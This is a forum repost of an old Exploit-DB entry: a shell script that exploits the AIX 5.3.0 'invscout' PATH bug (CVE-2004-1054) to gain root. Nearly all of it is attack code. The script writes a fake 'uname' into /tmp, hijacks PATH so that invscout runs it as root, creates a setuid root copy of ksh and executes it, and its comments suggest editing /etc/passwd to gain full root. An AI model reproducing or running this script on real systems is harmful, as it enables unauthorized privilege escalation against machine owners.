Exploit AIX 5.3.0 - 'invscout' Local Command Execution

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
898
Проверка EDB
  1. Пройдено
Автор
RI0T
Тип уязвимости
LOCAL
Платформа
AIX
CVE
cve-2004-1054
Дата публикации
2005-03-25
Код:
#!/usr/bin/sh
# r00t exploit written for the invscout bug reported by Idefense labs
# http://www.idefense.com/application/poi/display?id=171&type=vulnerabilities
# coded by ri0t exploitation is trivial but automated with this script
# www.ri0tnet.net
#
# usage ./getr00t.sh :)
# exploitation gives euid(root) from here getting guid (root) is as simple as an
# /etc/passwd edit 


cd /tmp
echo '/usr/bin/cp /usr/bin/ksh ./' > uname
echo '/usr/bin/chown root:system ./ksh' >> uname
echo '/usr/bin/chmod 777 ./ksh' >> uname
echo '/usr/bin/chmod +s ./ksh' >> uname
/usr/bin/chmod 777 uname
PATH=./
export PATH
/usr/sbin/invscout
PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./"
export PATH
exec /tmp/ksh

# milw0rm.com [2005-03-25]
 
Источник
www.exploit-db.com

Похожие темы